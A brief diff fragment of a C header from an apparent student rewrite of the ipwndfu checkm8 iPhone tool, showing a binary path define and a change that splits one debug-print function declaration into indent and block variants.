CHECKM8_BIN_BASE "/home/grg/Projects/School/NCSU/iphone_aes_sc/ipwndfu_rewrite_c/checkm8_remote/bin/" -void checkm8_debug(const char *format, ...); +void checkm8_debug_indent(const char *format, ...); +void checkm8_debug_block(const char *format, ...); #endif //IPWNDFU_REWRITE_C_CHECKM8_CONFIG_H